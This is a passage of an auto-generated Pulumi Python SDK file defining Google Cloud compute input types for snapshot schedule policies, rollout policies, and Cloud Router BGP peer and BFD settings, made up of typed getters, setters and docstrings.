Policy for retention of scheduled snapshots.
:param pulumi.Input[int] max_retention_days: Maximum age of the snapshot that is allowed to be kept.
:param pulumi.Input['ResourcePolicySnapshotSchedulePolicyRetentionPolicyOnSourceDiskDelete'] on_source_disk_delete: Specifies the behavior to apply to scheduled snapshots when the source disk is deleted.
"""
if max_retention_days is not None:
pulumi.set(__self__, "max_retention_days", max_retention_days)
if on_source_disk_delete is not None:
pulumi.set(__self__, "on_source_disk_delete", on_source_disk_delete)
@property
@pulumi.getter(name="maxRetentionDays")
def max_retention_days(self) -> Optional[pulumi.Input[int]]:
"""
Maximum age of the snapshot that is allowed to be kept.
"""
return pulumi.get(self, "max_retention_days")
@max_retention_days.setter
def max_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_retention_days", value)
@property
@pulumi.getter(name="onSourceDiskDelete")
def on_source_disk_delete(self) -> Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicyRetentionPolicyOnSourceDiskDelete']]:
"""
Specifies the behavior to apply to scheduled snapshots when the source disk is deleted.
"""
return pulumi.get(self, "on_source_disk_delete")
@on_source_disk_delete.setter
def on_source_disk_delete(self, value: Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicyRetentionPolicyOnSourceDiskDelete']]):
pulumi.set(self, "on_source_disk_delete", value)
@pulumi.input_type
class ResourcePolicySnapshotSchedulePolicyScheduleArgs:
def __init__(__self__, *,
daily_schedule: Optional[pulumi.Input['ResourcePolicyDailyCycleArgs']] = None,
hourly_schedule: Optional[pulumi.Input['ResourcePolicyHourlyCycleArgs']] = None,
weekly_schedule: Optional[pulumi.Input['ResourcePolicyWeeklyCycleArgs']] = None):
"""
A schedule for disks where the schedueled operations are performed.
"""
if daily_schedule is not None:
pulumi.set(__self__, "daily_schedule", daily_schedule)
if hourly_schedule is not None:
pulumi.set(__self__, "hourly_schedule", hourly_schedule)
if weekly_schedule is not None:
pulumi.set(__self__, "weekly_schedule", weekly_schedule)
@property
@pulumi.getter(name="dailySchedule")
def daily_schedule(self) -> Optional[pulumi.Input['ResourcePolicyDailyCycleArgs']]:
return pulumi.get(self, "daily_schedule")
@daily_schedule.setter
def daily_schedule(self, value: Optional[pulumi.Input['ResourcePolicyDailyCycleArgs']]):
pulumi.set(self, "daily_schedule", value)
@property
@pulumi.getter(name="hourlySchedule")
def hourly_schedule(self) -> Optional[pulumi.Input['ResourcePolicyHourlyCycleArgs']]:
return pulumi.get(self, "hourly_schedule")
@hourly_schedule.setter
def hourly_schedule(self, value: Optional[pulumi.Input['ResourcePolicyHourlyCycleArgs']]):
pulumi.set(self, "hourly_schedule", value)
@property
@pulumi.getter(name="weeklySchedule")
def weekly_schedule(self) -> Optional[pulumi.Input['ResourcePolicyWeeklyCycleArgs']]:
return pulumi.get(self, "weekly_schedule")
@weekly_schedule.setter
def weekly_schedule(self, value: Optional[pulumi.Input['ResourcePolicyWeeklyCycleArgs']]):
pulumi.set(self, "weekly_schedule", value)
@pulumi.input_type
class ResourcePolicySnapshotSchedulePolicySnapshotPropertiesArgs:
def __init__(__self__, *,
chain_name: Optional[pulumi.Input[str]] = None,
guest_flush: Optional[pulumi.Input[bool]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
storage_locations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Specified snapshot properties for scheduled snapshots created by this policy.
:param pulumi.Input[str] chain_name: Chain name that the snapshot is created in.
:param pulumi.Input[bool] guest_flush: Indication to perform a 'guest aware' snapshot.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to scheduled snapshots. These can be later modified by the setLabels method. Label values may be empty.
:param pulumi.Input[Sequence[pulumi.Input[str]]] storage_locations: Cloud Storage bucket storage location of the auto snapshot (regional or multi-regional).
"""
if chain_name is not None:
pulumi.set(__self__, "chain_name", chain_name)
if guest_flush is not None:
pulumi.set(__self__, "guest_flush", guest_flush)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if storage_locations is not None:
pulumi.set(__self__, "storage_locations", storage_locations)
@property
@pulumi.getter(name="chainName")
def chain_name(self) -> Optional[pulumi.Input[str]]:
"""
Chain name that the snapshot is created in.
"""
return pulumi.get(self, "chain_name")
@chain_name.setter
def chain_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "chain_name", value)
@property
@pulumi.getter(name="guestFlush")
def guest_flush(self) -> Optional[pulumi.Input[bool]]:
"""
Indication to perform a 'guest aware' snapshot.
"""
return pulumi.get(self, "guest_flush")
@guest_flush.setter
def guest_flush(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "guest_flush", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Labels to apply to scheduled snapshots. These can be later modified by the setLabels method. Label values may be empty.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="storageLocations")
def storage_locations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Cloud Storage bucket storage location of the auto snapshot (regional or multi-regional).
"""
return pulumi.get(self, "storage_locations")
@storage_locations.setter
def storage_locations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "storage_locations", value)
@pulumi.input_type
class ResourcePolicySnapshotSchedulePolicyArgs:
def __init__(__self__, *,
retention_policy: Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicyRetentionPolicyArgs']] = None,
schedule: Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicyScheduleArgs']] = None,
snapshot_properties: Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicySnapshotPropertiesArgs']] = None):
"""
A snapshot schedule policy specifies when and how frequently snapshots are to be created for the target disk. Also specifies how many and how long these scheduled snapshots should be retained.
:param pulumi.Input['ResourcePolicySnapshotSchedulePolicyRetentionPolicyArgs'] retention_policy: Retention policy applied to snapshots created by this resource policy.
:param pulumi.Input['ResourcePolicySnapshotSchedulePolicyScheduleArgs'] schedule: A Vm Maintenance Policy specifies what kind of infrastructure maintenance we are allowed to perform on this VM and when. Schedule that is applied to disks covered by this policy.
:param pulumi.Input['ResourcePolicySnapshotSchedulePolicySnapshotPropertiesArgs'] snapshot_properties: Properties with which snapshots are created such as labels, encryption keys.
"""
if retention_policy is not None:
pulumi.set(__self__, "retention_policy", retention_policy)
if schedule is not None:
pulumi.set(__self__, "schedule", schedule)
if snapshot_properties is not None:
pulumi.set(__self__, "snapshot_properties", snapshot_properties)
@property
@pulumi.getter(name="retentionPolicy")
def retention_policy(self) -> Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicyRetentionPolicyArgs']]:
"""
Retention policy applied to snapshots created by this resource policy.
"""
return pulumi.get(self, "retention_policy")
@retention_policy.setter
def retention_policy(self, value: Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicyRetentionPolicyArgs']]):
pulumi.set(self, "retention_policy", value)
@property
@pulumi.getter
def schedule(self) -> Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicyScheduleArgs']]:
"""
A Vm Maintenance Policy specifies what kind of infrastructure maintenance we are allowed to perform on this VM and when. Schedule that is applied to disks covered by this policy.
"""
return pulumi.get(self, "schedule")
@schedule.setter
def schedule(self, value: Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicyScheduleArgs']]):
pulumi.set(self, "schedule", value)
@property
@pulumi.getter(name="snapshotProperties")
def snapshot_properties(self) -> Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicySnapshotPropertiesArgs']]:
"""
Properties with which snapshots are created such as labels, encryption keys.
"""
return pulumi.get(self, "snapshot_properties")
@snapshot_properties.setter
def snapshot_properties(self, value: Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicySnapshotPropertiesArgs']]):
pulumi.set(self, "snapshot_properties", value)
@pulumi.input_type
class ResourcePolicyWeeklyCycleDayOfWeekArgs:
def __init__(__self__, *,
day: Optional[pulumi.Input['ResourcePolicyWeeklyCycleDayOfWeekDay']] = None,
start_time: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input['ResourcePolicyWeeklyCycleDayOfWeekDay'] day: Defines a schedule that runs on specific days of the week. Specify one or more days. The following options are available: MONDAY, TUESDAY, WEDNESDAY, THURSDAY, FRIDAY, SATURDAY, SUNDAY.
:param pulumi.Input[str] start_time: Time within the window to start the operations. It must be in format "HH:MM", where HH : [00-23] and MM : [00-00] GMT.
"""
if day is not None:
pulumi.set(__self__, "day", day)
if start_time is not None:
pulumi.set(__self__, "start_time", start_time)
@property
@pulumi.getter
def day(self) -> Optional[pulumi.Input['ResourcePolicyWeeklyCycleDayOfWeekDay']]:
"""
Defines a schedule that runs on specific days of the week. Specify one or more days. The following options are available: MONDAY, TUESDAY, WEDNESDAY, THURSDAY, FRIDAY, SATURDAY, SUNDAY.
"""
return pulumi.get(self, "day")
@day.setter
def day(self, value: Optional[pulumi.Input['ResourcePolicyWeeklyCycleDayOfWeekDay']]):
pulumi.set(self, "day", value)
@property
@pulumi.getter(name="startTime")
def start_time(self) -> Optional[pulumi.Input[str]]:
"""
Time within the window to start the operations. It must be in format "HH:MM", where HH : [00-23] and MM : [00-00] GMT.
"""
return pulumi.get(self, "start_time")
@start_time.setter
def start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "start_time", value)
@pulumi.input_type
class ResourcePolicyWeeklyCycleArgs:
def __init__(__self__, *,
day_of_weeks: Optional[pulumi.Input[Sequence[pulumi.Input['ResourcePolicyWeeklyCycleDayOfWeekArgs']]]] = None):
"""
Time window specified for weekly operations.
:param pulumi.Input[Sequence[pulumi.Input['ResourcePolicyWeeklyCycleDayOfWeekArgs']]] day_of_weeks: Up to 7 intervals/windows, one for each day of the week.
"""
if day_of_weeks is not None:
pulumi.set(__self__, "day_of_weeks", day_of_weeks)
@property
@pulumi.getter(name="dayOfWeeks")
def day_of_weeks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourcePolicyWeeklyCycleDayOfWeekArgs']]]]:
"""
Up to 7 intervals/windows, one for each day of the week.
"""
return pulumi.get(self, "day_of_weeks")
@day_of_weeks.setter
def day_of_weeks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ResourcePolicyWeeklyCycleDayOfWeekArgs']]]]):
pulumi.set(self, "day_of_weeks", value)
@pulumi.input_type
class RolloutPolicyArgs:
def __init__(__self__, *,
default_rollout_time: Optional[pulumi.Input[str]] = None,
location_rollout_policies: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
A rollout policy configuration.
:param pulumi.Input[str] default_rollout_time: An optional RFC3339 timestamp on or after which the update is considered rolled out to any zone that is not explicitly stated.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] location_rollout_policies: Location based rollout policies to apply to the resource. Currently only zone names are supported and must be represented as valid URLs, like: zones/us-central1-a. The value expects an RFC3339 timestamp on or after which the update is considered rolled out to the specified location.
"""
if default_rollout_time is not None:
pulumi.set(__self__, "default_rollout_time", default_rollout_time)
if location_rollout_policies is not None:
pulumi.set(__self__, "location_rollout_policies", location_rollout_policies)
@property
@pulumi.getter(name="defaultRolloutTime")
def default_rollout_time(self) -> Optional[pulumi.Input[str]]:
"""
An optional RFC3339 timestamp on or after which the update is considered rolled out to any zone that is not explicitly stated.
"""
return pulumi.get(self, "default_rollout_time")
@default_rollout_time.setter
def default_rollout_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_rollout_time", value)
@property
@pulumi.getter(name="locationRolloutPolicies")
def location_rollout_policies(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Location based rollout policies to apply to the resource. Currently only zone names are supported and must be represented as valid URLs, like: zones/us-central1-a. The value expects an RFC3339 timestamp on or after which the update is considered rolled out to the specified location.
"""
return pulumi.get(self, "location_rollout_policies")
@location_rollout_policies.setter
def location_rollout_policies(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "location_rollout_policies", value)
@pulumi.input_type
class RouterAdvertisedIpRangeArgs:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
range: Optional[pulumi.Input[str]] = None):
"""
Description-tagged IP ranges for the router to advertise.
:param pulumi.Input[str] description: User-specified description for the IP range.
:param pulumi.Input[str] range: The IP range to advertise. The value must be a CIDR-formatted string.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if range is not None:
pulumi.set(__self__, "range", range)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
User-specified description for the IP range.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def range(self) -> Optional[pulumi.Input[str]]:
"""
The IP range to advertise. The value must be a CIDR-formatted string.
"""
return pulumi.get(self, "range")
@range.setter
def range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "range", value)
@pulumi.input_type
class RouterBgpPeerBfdArgs:
def __init__(__self__, *,
min_receive_interval: Optional[pulumi.Input[int]] = None,
min_transmit_interval: Optional[pulumi.Input[int]] = None,
multiplier: Optional[pulumi.Input[int]] = None,
session_initialization_mode: Optional[pulumi.Input['RouterBgpPeerBfdSessionInitializationMode']] = None):
"""
:param pulumi.Input[int] min_receive_interval: The minimum interval, in milliseconds, between BFD control packets received from the peer router. The actual value is negotiated between the two routers and is equal to the greater of this value and the transmit interval of the other router. If set, this value must be between 1000 and 30000. The default is 1000.
:param pulumi.Input[int] min_transmit_interval: The minimum interval, in milliseconds, between BFD control packets transmitted to the peer router. The actual value is negotiated between the two routers and is equal to the greater of this value and the corresponding receive interval of the other router. If set, this value must be between 1000 and 30000. The default is 1000.
:param pulumi.Input[int] multiplier: The number of consecutive BFD packets that must be missed before BFD declares that a peer is unavailable. If set, the value must be a value between 5 and 16. The default is 5.
:param pulumi.Input['RouterBgpPeerBfdSessionInitializationMode'] session_initialization_mode: The BFD session initialization mode for this BGP peer. If set to ACTIVE, the Cloud Router will initiate the BFD session for this BGP peer. If set to PASSIVE, the Cloud Router will wait for the peer router to initiate the BFD session for this BGP peer. If set to DISABLED, BFD is disabled for this BGP peer. The default is PASSIVE.
"""
if min_receive_interval is not None:
pulumi.set(__self__, "min_receive_interval", min_receive_interval)
if min_transmit_interval is not None:
pulumi.set(__self__, "min_transmit_interval", min_transmit_interval)
if multiplier is not None:
pulumi.set(__self__, "multiplier", multiplier)
if session_initialization_mode is not None:
pulumi.set(__self__, "session_initialization_mode", session_initialization_mode)
@property
@pulumi.getter(name="minReceiveInterval")
def min_receive_interval(self) -> Optional[pulumi.Input[int]]:
"""
The minimum interval, in milliseconds, between BFD control packets received from the peer router. The actual value is negotiated between the two routers and is equal to the greater of this value and the transmit interval of the other router. If set, this value must be between 1000 and 30000. The default is 1000.
"""
return pulumi.get(self, "min_receive_interval")
@min_receive_interval.setter
def min_receive_interval(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_receive_interval", value)
@property
@pulumi.getter(name="minTransmitInterval")
def min_transmit_interval(self) -> Optional[pulumi.Input[int]]:
"""
The minimum interval, in milliseconds, between BFD control packets transmitted to the peer router. The actual value is negotiated between the two routers and is equal to the greater of this value and the corresponding receive interval of the other router. If set, this value must be between 1000 and 30000. The default is 1000.
"""
return pulumi.get(self, "min_transmit_interval")
@min_transmit_interval.setter
def min_transmit_interval(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_transmit_interval", value)
@property
@pulumi.getter
def multiplier(self) -> Optional[pulumi.Input[int]]:
"""
The number of consecutive BFD packets that must be missed before BFD declares that a peer is unavailable. If set, the value must be a value between 5 and 16. The default is 5.
"""
return pulumi.get(self, "multiplier")
@multiplier.setter
def multiplier(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "multiplier", value)
@property
@pulumi.getter(name="sessionInitializationMode")
def session_initialization_mode(self) -> Optional[pulumi.Input['RouterBgpPeerBfdSessionInitializationMode']]:
"""
The BFD session initialization mode for this BGP peer. If set to ACTIVE, the Cloud Router will initiate the BFD session for this BGP peer. If set to PASSIVE, the Cloud Router will wait for the peer router to initiate the BFD session for this BGP peer. If set to DISABLED, BFD is disabled for this BGP peer. The default is PASSIVE.
"""
return pulumi.get(self, "session_initialization_mode")
@session_initialization_mode.setter
def session_initialization_mode(self, value: Optional[pulumi.Input['RouterBgpPeerBfdSessionInitializationMode']]):
pulumi.set(self, "session_initialization_mode", value)
@pulumi.input_type
class RouterBgpPeerArgs:
def __init__(__self__, *,
advertise_mode: Optional[pulumi.Input['RouterBgpPeerAdvertiseMode']] = None,
advertised_groups: Optional[pulumi.Input[Sequence[pulumi.Input['RouterBgpPeerAdvertisedGroupsItem']]]] = None,
advertised_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input['RouterAdvertisedIpRangeArgs']]]] = None,
advertised_route_priority: Optional[pulumi.Input[int]] = None,
bfd: Optional[pulumi.Input['RouterBgpPeerBfdArgs']] = None,
enable: Optional[pulumi.Input['RouterBgpPeerEnable']] = None,
enable_ipv6: Optional[pulumi.Input[bool]] = None,
interface_name: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
ipv6_nexthop_address: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
peer_asn: Optional[pulumi.Input[int]] = None,
peer_ip_address: Optional[pulumi.Input[str]] = None,
peer_ipv6_nexthop_address: Optional[pulumi.Input[str]] = None,
router_appliance_instance: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input['RouterBgpPeerAdvertiseMode'] advertise_mode: User-specified flag to indicate which mode to use for advertisement.
:param pulumi.Input[Sequence[pulumi.Input['RouterBgpPeerAdvertisedGroupsItem']]] advertised_groups: User-specified list of prefix groups to advertise in custom mode, which can take one of the following options: - ALL_SUBNETS: Advertises all available subnets, including peer VPC subnets. - ALL_VPC_SUBNETS: Advertises the router's own VPC subnets. Note that this field can only be populated if advertise_mode is CUSTOM and overrides the list defined for the router (in the "bgp" message). These groups are advertised in addition to any specified prefixes. Leave this field blank to advertise no custom groups.
:param pulumi.Input[Sequence[pulumi.Input['RouterAdvertisedIpRangeArgs']]] advertised_ip_ranges: User-specified list of individual IP ranges to advertise in custom mode. This field can only be populated if advertise_mode is CUSTOM and overrides the list defined for the router (in the "bgp" message). These IP ranges are advertised in addition to any specified groups. Leave this field blank to advertise no custom IP ranges.
:param pulumi.Input[int] advertised_route_priority: The priority of routes advertised to this BGP peer. Where there is more than one matching route of maximum length, the routes with the lowest priority value win.
:param pulumi.Input['RouterBgpPeerBfdArgs'] bfd: BFD configuration for the BGP peering.
:param pulumi.Input['RouterBgpPeerEnable'] enable: The status of the BGP peer connection. If set to FALSE, any active session with the peer is terminated and all associated routing information is removed. If set to TRUE, the peer connection can be established with routing information. The default is TRUE.
:param pulumi.Input[bool] enable_ipv6: Enable IPv6 traffic over BGP Peer. If not specified, it is disabled by default.
:param pulumi.Input[str] interface_name: Name of the interface the BGP peer is associated with.
:param pulumi.Input[str] ip_address: IP address of the interface inside Google Cloud Platform. Only IPv4 is supported.
:param pulumi.Input[str] ipv6_nexthop_address: IPv6 address of the interface inside Google Cloud Platform.
:param pulumi.Input[str] name: Name of this BGP peer. The name must be 1-63 characters long, and comply with RFC1035. Specifically, the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the first character must be a lowercase letter, and all following characters must be a dash, lowercase letter, or digit, except the last character, which cannot be a dash.
:param pulumi.Input[int] peer_asn: Peer BGP Autonomous System Number (ASN). Each BGP interface may use a different value.
:param pulumi.Input[str] peer_ip_address: IP address of the BGP interface outside Google Cloud Platform. Only IPv4 is supported.
:param pulumi.Input[str] peer_ipv6_nexthop_address: IPv6 address of the BGP interface outside Google Cloud Platform.
:param pulumi.Input[str] router_appliance_instance: URI of the VM instance that is used as third-party router appliances such as Next Gen Firewalls, Virtual Routers, or Router Appliances. The VM instance must be located in zones contained in the same region as this Cloud Router. The VM instance is the peer side of the BGP session.
"""
if advertise_mode is not None:
pulumi.set(__self__, "advertise_mode", advertise_mode)
if advertised_groups is not None:
pulumi.set(__self__, "advertised_groups", advertised_groups)
if advertised_ip_ranges is not None:
pulumi.set(__self__, "advertised_ip_ranges", advertised_ip_ranges)
if advertised_route_priority is not None:
pulumi.set(__self__, "advertised_route_priority", advertised_route_priority)
if bfd is not None:
pulumi.set(__self__, "bfd", bfd)
if enable is not None:
pulumi.set(__self__, "enable", enable)
if enable_ipv6 is not None:
pulumi.set(__self__, "enable_ipv6", enable_ipv6)
if interface_name is not None:
pulumi.set(__self__, "interface_name", interface_name)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if ipv6_nexthop_address is not None:
pulumi.set(__self__, "ipv6_nexthop_address", ipv6_nexthop_address)
if name is not None:
pulumi.set(__self__, "name", name)
if peer_asn is not None:
pulumi.set(__self__, "peer_asn", peer_asn)
if peer_ip_address is not None:
pulumi.set(__self__, "peer_ip_address", peer_ip_address)
if peer_ipv6_nexthop_address is not None:
pulumi.set(__self__, "peer_ipv6_nexthop_address", peer_ipv6_nexthop_address)
if router_appliance_instance is not None:
pulumi.set(__self__, "router_appliance_instance", router_appliance_instance)
@property
@pulumi.getter(name="advertiseMode")
def advertise_mode(self) -> Optional[pulumi.Input['RouterBgpPeerAdvertiseMode']]:
"""
User-specified flag to indicate which mode to use for advertisement.
"""
return pulumi.get(self, "advertise_mode")
@advertise_mode.setter
def advertise_mode(self, value: Optional[pulumi.Input['RouterBgpPeerAdvertiseMode']]):
pulumi.set(self, "advertise_mode", value)
@property
@pulumi.getter(name="advertisedGroups")
def advertised_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RouterBgpPeerAdvertisedGroupsItem']]]]:
"""
User-specified list of prefix groups to advertise in custom mode, which can take one of the following options: - ALL_SUBNETS: Advertises all available subnets, including peer VPC subnets. - ALL_VPC_SUBNETS: Advertises the router's own VPC subnets. Note that this field can only be populated if advertise_mode is CUSTOM and overrides the list defined for the router (in the "bgp" message). These groups are advertised in addition to any specified prefixes. Leave this field blank to advertise no custom groups.
"""
return pulumi.get(self, "advertised_groups")
@advertised_groups.setter
def advertised_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RouterBgpPeerAdvertisedGroupsItem']]]]):
pulumi.set(self, "advertised_groups", value)
@property
@pulumi.getter(name="advertisedIpRanges")
def advertised_ip_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RouterAdvertisedIpRangeArgs']]]]:
"""
User-specified list of individual IP ranges to advertise in custom mode. This field can only be populated if advertise_mode is CUSTOM and overrides the list defined for the router (in the "bgp" message). These IP ranges are advertised in addition to any specified groups. Leave this field blank to advertise no custom IP ranges.
"""
return pulumi.get(self, "advertised_ip_ranges")
@advertised_ip_ranges.setter
def advertised_ip_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RouterAdvertisedIpRangeArgs']]]]):
pulumi.set(self, "advertised_ip_ranges", value)
@property
@pulumi.getter(name="advertisedRoutePriority")
def advertised_route_priority(self) -> Optional[pulumi.Input[int]]:
"""
The priority of routes advertised to this BGP peer. Where there is more than one matching route of maximum length, the routes with the lowest priority value win.
"""
return pulumi.get(self, "advertised_route_priority")
@advertised_route_priority.setter
def advertised_route_priority(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "advertised_route_priority", value)
@property
@pulumi.getter
def bfd(self) -> Optional[pulumi.Input['RouterBgpPeerBfdArgs']]:
"""
BFD configuration for the BGP peering.
"""
return pulumi.get(self, "bfd")
@bfd.setter
def bfd(self, value: Optional[pulumi.Input['RouterBgpPeerBfdArgs']]):
pulumi.set(self, "bfd", value)
@property
@pulumi.getter
def enable(self) -> Optional[pulumi.Input['RouterBgpPeerEnable']]:
"""
The status of the BGP peer connection. If set to FALSE, any active session with the peer is terminated and all associated routing information is removed. If set to TRUE, the peer connection can be established with routing information. The default is TRUE.
"""
return pulumi.get(self, "enable")
@enable.setter
def enable(self, value: Optional[pulumi.Input['RouterBgpPeerEnable']]):
pulumi.set(self, "enable", value)
@property
@pulumi.getter(name="enableIpv6")
def enable_ipv6(self) -> Optional[pulumi.Input[bool]]:
"""
Enable IPv6 traffic over BGP Peer. If not specified, it is disabled by default.
"""
return pulumi.get(self, "enable_ipv6")
@enable_ipv6.setter
def enable_ipv6(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_ipv6", value)
@property
@pulumi.getter(name="interfaceName")
def interface_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the interface the BGP peer is associated with.
"""
return pulumi.get(self, "interface_name")
@interface_name.setter
def interface_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "interface_name", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
IP address of the interface inside Google Cloud Platform. Only IPv4 is supported.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter(name="ipv6NexthopAddress")
def ipv6_nexthop_address(self) -> Optional[pulumi.Input[str]]:
"""
IPv6 address of the interface inside Google Cloud Platform.
"""
return pulumi.get(self, "ipv6_nexthop_address")
@ipv6_nexthop_address.setter
def ipv6_nexthop_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ipv6_nexthop_address", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of this BGP peer. The name must be 1-63 characters long, and comply with RFC1035. Specifically, the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the first character must be a lowercase letter, and all following characters must be a dash, lowercase letter, or digit, except the last character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="peerAsn")
def peer_asn(self) -> Optional[pulumi.Input[int]]:
"""
Peer BGP Autonomous System Number (ASN). Each BGP interface may use a different value.
"""
return pulumi.get(self, "peer_asn")
@peer_asn.setter
def peer_asn(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "peer_asn", value)
@property
@pulumi.getter(name="peerIpAddress")
def peer_ip_address(self) -> Optional[pulumi.Input[str]]:
"""
IP address of the BGP interface outside Google Cloud Platform. Only IPv4 is supported.
"""
return pulumi.get(self, "peer_ip_address")
@peer_ip_address.setter
def peer_ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "peer_ip_address", value)
@property
@pulumi.getter(name="peerIpv6NexthopAddress")
def peer_ipv6_nexthop_address(self) -> Optional[pulumi.Input[str]]:
"""
IPv6 address of the BGP interface outside Google Cloud Platform.
"""
return pulumi.get(self, "peer_ipv6_nexthop_address")
@peer_ipv6_nexthop_address.setter
def peer_ipv6_nexthop_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "peer_ipv6_nexthop_address", value)
@property
@pulumi.getter(name="routerApplianceInstance")
def router_appliance_instance(self) -> Optional[pulumi.Input[str]]:
"""
URI of the VM instance that is used as third-party router appliances such as Next Gen Firewalls, Virtual Routers, or Router Appliances. The VM instance must be located in zones contained in the same region as this Cloud Router. The VM instance is the peer side of the BGP session.
"""
return pulumi.get(self, "router_appliance_instance")
@router_appliance_instance.setter
def router_appliance_instance(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "router_appliance_instance", value)
@pulumi.input_type
class RouterBgpArgs:
def __init__(__self__, *,
advertise_mode: Optional[pulumi.Input['RouterBgpAdvertiseMode']] = None,
advertised_groups: Optional[pulumi.Input[Sequence[pulumi.Input['RouterBgpAdvertisedGroupsItem']]]] = None,
advertised_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input['RouterAdvertisedIpRangeArgs']]]] = None,
asn: Optional[pulumi.Input[int]] = None,
keepalive_interval: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input['RouterBgpAdvertiseMode'] advertise_mode: User-specified flag to indicate which mode to use for advertisement. The options are DEFAULT or CUSTOM.
:param pulumi.Input[Sequence[pulumi.Input['RouterBgpAdvertisedGroupsItem']]] advertised_groups: User-specified list of prefix groups to advertise in custom mode. This field can only be populated if advertise_mode is CUSTOM and is advertised to all peers of the router. These groups will be advertised in addition to any specified prefixes. Leave this field blank to advertise no custom groups.
:param pulumi.Input[Sequence[pulumi.Input['RouterAdvertisedIpRangeArgs']]] advertised_ip_ranges: User-specified list of individual IP ranges to advertise in custom mode. This field can only be populated if advertise_mode is CUSTOM and is advertised to all peers of the router. These IP ranges will be advertised in addition to any specified groups. Leave this field blank to advertise no custom IP ranges.
:param pulumi.Input[int] asn: Local BGP Autonomous System Number (ASN). Must be an RFC6996 private ASN, either 16-bit or 32-bit. The value will be fixed for this router resource. All VPN tunnels that link to this router will have the same local ASN.
:param pulumi.Input[int] keepalive_interval: The interval in seconds between BGP keepalive messages that are sent to the peer. Hold time is three times the interval at which keepalive messages are sent, and the hold time is the maximum number of seconds allowed to elapse between successive keepalive messages that BGP receives from a peer. BGP will use the smaller of either the local hold time value or the peer's hold time value as the hold time for the BGP connection between the two peers. If set, this value must be between 20 and 60. The default is 20.
"""
if advertise_mode is not None:
pulumi.set(__self__, "advertise_mode", advertise_mode)
if advertised_groups is not None:
pulumi.set(__self__, "advertised_groups", advertised_groups)
if advertised_ip_ranges is not None:
pulumi.set(__self__, "advertised_ip_ranges", advertised_ip_ranges)
if asn is not None:
pulumi.set(__self__, "asn", asn)
if keepalive_interval is not None:
